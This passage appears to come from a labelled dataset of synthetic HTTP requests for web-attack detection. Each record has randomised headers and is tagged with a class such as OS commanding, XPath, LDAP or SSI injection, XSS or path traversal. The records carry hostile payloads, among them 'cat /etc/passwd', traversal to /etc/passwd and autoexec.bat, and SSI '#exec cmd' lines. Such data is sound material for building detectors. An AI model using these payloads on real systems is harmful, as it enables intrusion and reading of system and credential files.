en=i8R4qBwaQ&p6xlhn=N&ziacceptdVdrop=Dtiinputu&ueimasIEg1pm=6H9sdeoiraa&oFun=tn0rseqsupdategteit&M9Beval=033113&ifandphpuKeSm9Em=3418&Oink8Emiqtescr=samtcrmfrs 3:ebgsounde>childcae&ca=76804623&4cociQego=541

End - Id: 49993
Start - Id: 43433
class: OsCommanding
GET /eoSnrs0nuba4iyLea/1Qk4iSIDall/f@MQKF9NkgZ8orcrEkwI.htm?nodejTOx38winnt=030660&whtFsenE=732066&L6oxdivimgmochaWS6_=18&mSstNdesEmg=h%27&tdacwltia9nb=cat+++++%2Fetc%2Fpasswd+%7C&eIs2fmhle=%3DrEa%5Bb&abl=h4blTg%40f-. HTTP/1.1
Host: 216.96.246.7
Connection: keep-alive
Accept: application/rtf, text/plain
Accept-Charset: koi8-r, macintosh, utf-7
Accept-Encoding: 
Accept-Language: 1tlo-zgsnpnmz;q=0.3
Cache-Control: dEr='8u2'
Client-ip: 230.11.35.165
Cookie: us0t4nR5goo=12263337;soohEale9Hee=%(rc0aIolo9;o?d;zoh=wiem
Cookie2: $Version="28"
Date: Mon, 14 Aug 06 10:27:06 GMT
ETag: "UylSwj-j1YsBiH-"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Fri, 25 Jul 08 14:05:16 GMT
If-Unmodified-Since: Wed, 07 Nov 07 11:37:18 UTC
If-Match: "kiqglVPP@sCFdFE-"
If-None-Match: "5yN@qadtWaSIwcNLNoi"
If-Range: "8ZJQB2gVMwuCevYU_vyg"
Max-Forwards: 1
MIME-Version: 4.0
Pragma: hmpeop=ernonse
Proxy-Authorization: Digest realm
Authorization: NTLM dWgybmV4YTZrckFPQXFoY29mTm9laGhsdU50OXduZHZodFpFdFRz
Range: 89-,6-,2-
Referer: http://www.vo6scen.fr/iqos/scaerl/hhHn.gz
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 8.7; SO-tt; rv:7.7.3) Gecko/03830757
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 801x1629
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: ebnipp
Upgrade: e2idw/6.5, 2eabf/4.4, hean/1.8
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43433
Start - Id: 37753
class: LdapInjection
GET /rn@gpDpd4/s.tglJ/M9F/stmenhns7Ert3.js?wotmrta9tetm=ayhRxaeid%5D%5Bu&egyioeahyayf=7473520&sEenyOs=telneta5g7o5auaRigi&lhpibwaxnlto9l=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&bhusATn6raxa=ne9&rIfe5=6aenAlre HTTP/1.0
Host: www.ldesYsvae.de
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesesimp;q=0.0
Accept-Encoding: compress;q=0.7, compress;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 18.137.252.198
Cookie: XrkLbwDallxr9=lQCsJ;dTdst=84503120;XORtZn.9fkY=e8naisea7ttebt;EIYAKi=968165316
Cookie2: $Version="98"
Date: Mon, 25 Jun 07 06:37:49 GMT
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 18 Sep 07 13:11:51 GMT
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: *
Max-Forwards: 63
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 6-
Referer: http://www.eleanvl.org/hohe/rdv5ce/hlgeAe.pdf
TE: deflate,gzip;q=0.2,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: sf3t0hol/4.3
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37753
Start - Id: 48934
class: XPathInjection
GET /let/l8oabcfireosdno/aYK5XkxeDSBo7Gw/ehaetanHrcmitzoor5/ojoe/EetiajymNil/lse/cLgcHXNDkQCj/wWmrgpZ4/ldhi2iyibu/oGFIMSqoCwT7.mdb?9e1snb1iy=%26getoc&cs=367084&etmtllrnlta=48962728&r2XaW5Dz8eAiltl=m4esI%27+++++or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i+%2B+++j+++%2B++++k%2B++++l+%2B+1%29%5D+%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+%27hrd%27++++%3D++%27+++cL%27++or&6ahwehi=l32sthfNhh&p0waeeKiudciia=481&eieeeT=3Eh6h1&5_@Ewget0rapA=peV9x4_H HTTP/1.1
Host: 148.240.117.59
Connection: close
Accept: text/*, video/mpeg, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 163.68.137.81
Cookie: umallahd=ycY;oltdp11li8c=ai6;eocIeut1osp6alr=76553
Cookie2: $Version="9"
Date: Wed, 14 May 08 15:44:18 UTC
ETag: "pu9Z2wUyy65gZhc"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 30 Oct 04 04:32:58 GMT
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: "O7Sn0543aQHWUI_e9Dv"
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Digest cnonce="psbOmzhs"
Range: 326-470558,-0121
Referer: /heTh09t/esnhuc.rar
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/5.6 (compatible; llodfeokla; WinNT; mnznVrqt; ebk7)
UA-CPU: 68000
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: compress
Upgrade: tHifu/1.7
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48934
Start - Id: 46898
class: XSS
PUT /6ghOtBXdvVu_Rqy.103d/eiagoaHtxsaao/Jy1f/n5S/kgQ0hE3adminh/il/wdFsIvfT/qmTHlkaia2mi/tZNNhT.Ei/tysyeqno/hNol6-p/FVF.jpeg? HTTP/1.0
Content-Length: 167
Content-Language: 7
Content-Encoding: identity
Content-Location: /swsh/nrsrebws.swf
Content-MD5: bHltbG1tcng2aXRleGhpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 09 19:12:07 UTC
Last-Modified: Sun, 21 Jun 09 17:23:52 GMT
Host: 18.176.27.139
Connection: oytdlxjf
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 165.85.124.10
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Wed, 14 Jan 09 19:12:38 CET
ETag: W/"Ja-Xf31larpSBKW5Vf9s"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 07 Apr 05 08:31:31 GMT
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "Rs0MEDjgCXp9YWEU1v"
If-None-Match: "EB1l2_cSfXqNpRA"
If-Range: "6SCmb-EidYjfxnaPUt"
Max-Forwards: 157
MIME-Version: 2.6
Pragma: dvH1='ewTyetna'
Proxy-Authorization: Digest nc=AcC43dEf
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /dono5ss.mdb
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 2.4; 9d-Ey; rv:7.5.6) Gecko/57462508
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8473x700
Via: 3.0 www.msRieUi.htm, FTP/8.5 www.emaoet9e.gif
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

rotur1tpfytae=<style    type =   "text/javascript  ">[alert ('9teb');]</style>&yBtht=u&mq4etre4j=myMT&A4U4NJstyleHopeny5t=di&idoEaru=lh

End - Id: 46898
Start - Id: 39960
class: SSI
GET /iXbHKydSHsJqgA1@/lb/tlosE/m8HknIE6RzEYjF15G/ONz1TeudRe/t03vc/etyti3stde3n3t/ca2emq1lyhiu/acil/luohjyhonwntntonewx8/shKNIaXGG.2kWQVe1I/euajatbinu.pl?nIb3=Vhespr3ebtaz&setsqeCnztp=%3C%21--+++%23exec+++++cmd%3D%22%2Fbin%2Fls+++-l++++%2Fhome%2FeeEbnhnn%2Fththt%22++++--%3E HTTP/1.0
Host: www.Fdnsef8sd.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.8, identity;q=0.8
Accept-Language: Shiqoeos-sgmi;q=0.6
Cache-Control: only-if-cached
Client-ip: 225.57.174.238
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="824"
Date: Sun, 10 Oct 04 23:07:44 CET
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 89Rhie
From: so7e5@hesdawuna.uk
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Sat, 07 Nov 09 20:28:52 CET
If-Match: *
If-None-Match: *
If-Range: "ZZIy54uWH9jS4MtkZG2i"
Max-Forwards: 87
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: tcu6 tcnh=eocvriTe
Referer: http://www.6atOtnru.cz/Nw0Rtdr.mdb
TE: trailers
Trailer: Connection
User-Agent: Mozilla/3.6 (X11; U; Solaris 2.4; eN-eo; rv:7.4.1) Gecko/16046588
UA-CPU: Sparc
UA-Color: color16
Via: 7.7 www.za0s.css, FTP/1.2 95.97.7.176:270
Transfer-Encoding: identity
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39960
Start - Id: 49531
class: XPathInjection
GET /eirre7eeiifnds/t0R1u5Kec5hdEb.php3?wni5rEhaRgyw=bitlug%27%5D+%7C+P+%7C++++%2F%2Fuser%5B+++name%2Ftext%28+++%29++%3D++++%27tet HTTP/1.1
Host: www.eEyatvdy.gov:80
Connection: faedtdr
Accept: image/*, audio/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: aiety-h17e;q=0.0, thafta8l-teuemsis
Cache-Control: max-age=69231
Client-ip: 91.134.19.242
Cookie: knsjpe=oservicesl7Nt%ap aSaN;cD5l=85737;craowfa=76422;Wsettkseaeqot=kyaupdatey1 rcgroup bya hreplace&mete;wrensEpo=86559374;Cmbq9R4processing-instructionvv=27
Cookie2: $Version="18"
Date: Thu, 13 Oct 05 20:43:31 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: teetaaso@eakeiyqkca.gov
If-Modified-Since: Tue, 18 Jul 06 16:11:59 UTC
If-Unmodified-Since: Thu, 03 Mar 05 08:38:21 GMT
If-Match: "itWx1sIPDtP89K0VoC6"
If-None-Match: "4pc0Y4uT91j-2FO@"
If-Range: *
Max-Forwards: 545
MIME-Version: 4.3
Pragma: Nn5d7e=e
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 515-482
Referer: http://rrt6oEta.org/oyieTibj/Moockat/XbsIareh/xDnlr/y0ot84.mdb
TE: deflate;q=0.5
Trailer: Connection
User-Agent: untvathyo (ayXx5e)
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 661x844
Via: HTTP/3.0 www.eMww.jpeg:8908
Transfer-Encoding: gzip
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49531
Start - Id: 45717
class: PathTransversal
GET /i9d3-hHelFf/Smpositionzlt8x/bCdYku7l.exe?pwoiop8wNcen=4482&srosc7wubw4o=lbrph&cutnisemePesll=i7l5lwmuheeidhfei&eEtrtncT=wheretwdbr+r6ar&tw3udoyasy5t=tDE%40&Ereerov=527994&rru4u=t%3A%5Cautoexec.bat&n7Sgawaye=8858328&wwRttltsa4rse=13aTlDtrediyi&ll6nyip=le%3Ao0tzoai8bin8bsam%40f%26Ch&1ex=2v-kFDdYW&ogliri2=7139&shecldenueO1aol=s+de&FlAX=60091 HTTP/1.0
Host: www.ReeStfrn.org
Connection: hnfnje
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rlo-oalihGR;q=0.9, rta-trSgpmqu;q=0.2, tatto7f-oencuLtt;q=0.6
Cache-Control: no-transform
Client-ip: 244.124.85.82
Cookie: vnsm6gLGw=jdd
Cookie2: $Version="66"
Date: Sat, 13 Aug 05 06:11:08 UTC
ETag: W/"skf@5ex@3kGAQzU0"
Expect: ipgDtc4E
From: reani1tb@daeireeubl.de
If-Modified-Since: Wed, 01 Aug 07 18:39:09 GMT
If-Unmodified-Since: Sun, 29 Jan 06 21:04:03 UTC
If-Match: *
If-None-Match: "wVohVIL27Q2lpzvZGMki"
If-Range: "q.H4ETXUaj_7myQ-"
Max-Forwards: 4696
MIME-Version: 2.1
Pragma: nr=E
Proxy-Authorization: Basic dGlvb2VyOmVleXQwbnBQ
Authorization: Digest username="eelt9"
Range: -500252,934-3694
Referer: http://enzEne.gov/metosiH/7yenl0e/eker/itnapto.msf
TE: deflate;q=0.9,trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: gtsnaG/1.3.1.6
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: enheoh; vb6aF=haMe2hf
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45717
Start - Id: 36253
class: PathTransversal
PUT /eJ/28M3F/bvo6Oo5b0ldS0sR3H/hxrqearanOtitedrgt/e0zH/hzrEpRndhf6Msb1/h4ynmfdsrtoal/ji5e6nCm9bRo77rp/tsdn/Tioroousnh/@i-89fe.tiff? HTTP/1.1
Content-Length: 384
Content-Language: dya2nr,fp3tiak
Content-Encoding: deflate
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Mar 05 24:27:20 GMT
Host: www.gi8m5ni.org
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-1, windows-1252, iso-2022-kr;q=0.5, windows-1254;q=0.7, x-mac-turkish
Accept-Encoding: 
Accept-Language: hairpg-ua3
Cache-Control: no-store
Client-ip: 151.44.78.82
Date: Mon, 24 Jul 06 08:04:02 UTC
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
If-Match: *
Max-Forwards: 7900
MIME-Version: 4.1
Referer: /geaOnflv.php
User-Agent: jzYqfr http://www.aeoei.net
Transfer-Encoding: compress
Warning: 299 www.ni9etq.css "deecyxs" "Sun, 01 Apr 07 19:16:21 UTC"
X-Serial-Number: 373561345188

LorezY=animg(0&rs0L8trear59Oo=+S e&yr=3579591&sdahcn0=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&4a=5892559&iv7Ti=seziframe3]bw8d&peimesseto6udam=833143&aaEaEejisei3sr=<slocationlo&gwrus=88273600&tcmjdTU=92336401&sciheguNDsmlua=lstnnealoebs&ftmsI2ocly1OE3=:nnmt;he6'+childlnt&tme=ddsaoT1

End - Id: 36253
Start - Id: 45615
class: PathTransversal
GET /a4efE.iXRY1pv/dqx2KTalMJwJh.tiff?AaiiIwucsw=5&0iuotcshhxhsma=bJdy_2oSY&olczshowo8lstsf=l&vo=apHsprsaeilrm&Tein68oh=5212&scriptstyleggrqdelete=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ule=enaeabeear&sMhcyoTowdnfta=oto&en9hoUeuoouot=+er3m%7E+%7Cshez&dmlj=eaetnahoeusrf%7Ere%2F&uxp9Ri=gwhemequenascaNts HTTP/1.1
Host: 53.32.30.207
Connection: keep-alive
Accept: image/*;q=0.3, application/x-tar
Accept-Charset: iso-8859-1;q=0.8, koi8-r, isiri-3342;q=0.7, hz-gb-2312;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 54.187.183.145
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="41"
Date: Mon, 17 May 04 04:36:33 CET
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 26 Apr 07 22:21:28 GMT
If-Match: "vm_nGXpx3o3hqPQre667"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: wia='eLi8'
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="erutn"
Range: 942-,71595-5
Referer: /sio4Tots/reoroy/Syitarid/ianceOx/mKeen.mspx
TE: deflate;q=0.2,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.5 (compatible; nslcwlsnf; Solaris; Erbe; httxeng3; e9hla)
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 5.4 96.107.199.90
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45615
Start - Id: 48646
class: XPathInjection
PUT /tlrwoE7clef/OXcD/dB/n8RW4M6Cxie.Nac7hOnw/waartrtsei/ahYDBL.F08Glz/e0/epPB7zg06gz/idmisKHHdivwu3m@/toUYOIt-F5/Seems/nKH32QaqGUHyl.mspx? HTTP/1.1
Content-Length: 234
Content-Language: haer,niapema,srsomce
Content-Encoding: compress
Content-Location: http://nnehpHmf.biz/esre3/ofumex/fsNpnN.cfm
Content-MD5: eXRybkVjNnRhaGhtclN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 04:29:17 CET
Last-Modified: Sat, 14 Oct 06 05:18:11 CET
Host: 38.58.106.74:80
Connection: nstr
Accept: */*;q=0.6
Accept-Charset: euc-tw;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 154.193.150.44
Cookie: l3trpen=3;i9=aaN;hh0b4s4ah5=rh>s@d%e=Eisth;9sCarhALoobl=84;lsq8IB=input
Cookie2: $Version="353"
Date: Fri, 21 Dec 07 07:35:14 GMT
ETag: W/"xQ73VO@JK@4R4B4"
Expect: br0Qn
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 31 Dec 06 23:38:06 UTC
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: "etZty1Mvx6yWfzC"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 4
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /esJEq.mdb
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 4.7; lo-ot; rv:8.2.5) Gecko/72479276
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: 3.6 www.ocoyl.js, 8.5 132.163.159.89:7, 2.2 www.sdtO.tiff
Transfer-Encoding: hAgbh
Upgrade: 4iiutb/0.5, Iima/4.6, uhhmar/1.8, nmohS/4.1, tm3A/2.3
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edsinnTl=iyt1ea6;e e kaoYias&1pareegryloa=88871     or     count(path/child::node()[position()=((i+j+k+l+1)]    |  path/child::*()[position()=(k+1)])=1 or   4043=

End - Id: 48646
Start - Id: 39876
class: SSI
GET /nodeDn3/hssd7p/nqanB4og/cH-4X_Bu9/iaae/Esyl/dynhopvdbo3/3i.tiff?Z_80mfSQHEGY=scriptt84gtmpWtE&.YGM=1573199&n3gyBQ3=0&sRQLshO=FiatB5utOAb0x4&rtAnHntlo9es=tlaf8iawaitelnetye&tagv0.1xmlH=8599&sboOi8rd=sri&XwJethS=euewowandnfm0hie&5UyjRpNGKHd5=%3Ae8xoe%3Belhbselect%40tftpxeE&e9Uosri8mr=%27t&ptsddTEsaxsib=p%3DimesocgTxs&5Q-Wdreplace4OjO=tiCQl84Py1%40i HTTP/1.1
Host: 90.247.25.75
Connection: close
Accept: image/jpeg
Accept-Charset: iso-8859-7, gb2312
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: o='isnDee'
Client-ip: 167.243.32.17
Cookie: 5elstoanrdc=290;ete=922;vgbif1AgoiOen=cwcdnMavbeae9;noratoutthhi=64NbyWCjJ
Date: Sun, 02 Aug 09 15:20:11 GMT
ETag: W/"OVY61M7X4h5-R44"
Expect: 100-continue
If-Unmodified-Since: Fri, 07 Sep 07 21:34:31 GMT
If-Match: *
If-None-Match: "jmp3hq7DKubiCCgvUez"
If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 85
MIME-Version: 1.0
Pragma: nspym='weGo'
Authorization: snkc Mgtgdo=olmd
Range: -348147,242473-7348,60-
Referer: /fohrrie.exe
TE: deflate,deflate,gzip;q=0.4
User-Agent: <!--    #exec  cmd="/bin/ls   -l   /home/Lcwfo6ta/ddantifhx0" -->
UA-Color: color16
Via: 1.8 245.121.48.148, ina4/4.7 81.218.155.73
Transfer-Encoding: deflate
Upgrade: ehegr/0.3
X-Serial-Number: 16113564354084828876

null

End - Id: 39876
Start - Id: 40020
class: SSI
GET /sf9QEjoscJ/kKuk1BfJW-aJQg-60fS/rinEaEmp/eostzDKWl.RiEHv/glaetrhwhd.mdb?tdnne6ran92tqe=iframennquia%3D%40TsthYaw&HdbhTys6tlonthR=ahwETOtih&bewliedqc0Esreo=ednulliaaae4o+&CditeafsolAe=isvEdH4IciDet%24&dpyin5jt2lem=40448&ufer9A6tehs=r6%40zR&3teqr=paiSytg6iige&whiphEwebEes=altqnodeletenLisknn8&dg=%3Be%25swnosNt%26i+seUtl&7ocsp1isdenee=3&yd=nDucE-lscripthepsrh0cstmpiy&rD=%3C%21+%23%3C%21--%23exec+cmd%3D%22id%22--%3E HTTP/1.1
Host: www.npmraeiiu.gov:80
Connection: emrsose
Accept: application/zip, video/*;q=0.8, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity
Accept-Language: syirnh-tr3;q=0.3
Cache-Control: eu='imor'
Client-ip: 146.59.132.42
Cookie: paoepinA=0;0ammferqoEc=76;C2mjshutdown=doomtlmxeonsesbDt;b4t8OEUnbilm=h1)i3sb  ae;nEioidIctng=7442;amyzwio=1144
Cookie2: $Version="48"
Date: Wed, 12 Nov 08 02:33:42 GMT
ETag: W/"M_ybmZVvZ2LN3u7elOw"
Expect: 100-continue
From: l1ahde@nablau.fr
If-Modified-Since: Wed, 25 Aug 04 17:54:14 GMT
If-Unmodified-Since: Sun, 14 Sep 08 15:30:10 UTC
If-Match: "3rmep4jMK7lbYFV@"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: /aslyo6/ldwdrz9t/hns0a/c6ax/ceco6.tar
TE: trailers,deflate;q=0.0
Trailer: Cache-Control
User-Agent: nEXRqL0PQ http://www.rXuisr.org
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 4.6 207.75.71.140
Transfer-Encoding: compress
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40020
Start - Id: 36449
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.sgee.org
Connection: bowt7rh
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.5, deflate;q=0.6, compress, gzip;q=0.9
Accept-Language: azoei-tcTxqe;q=0.5, mpteperX-arnt
Cache-Control: 5hOenna='te2J'
Client-ip: 144.216.33.215
Cookie: ia=301;a4ufrnykor=355;YoZ6B56W_dQJ=%kae
Cookie2: $Version="9"
Date: Sat, 29 Oct 05 19:54:51 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: ze8optsx=9asowa
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Thu, 10 Apr 08 12:54:38 CET
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Tue, 09 Feb 10 04:22:36 CET
Max-Forwards: 0777
MIME-Version: 8.0
Pragma: CJWtnmP='wtgih'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Digest qop=auth-int
Range: 336-,5495-71936
Referer: http://www.oofmr3ou.cz/ae5noe.pdf
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: nhTgpraoN/9.1.7.0
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 29.240.171.31
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36449
Start - Id: 35090
class: SqlInjection
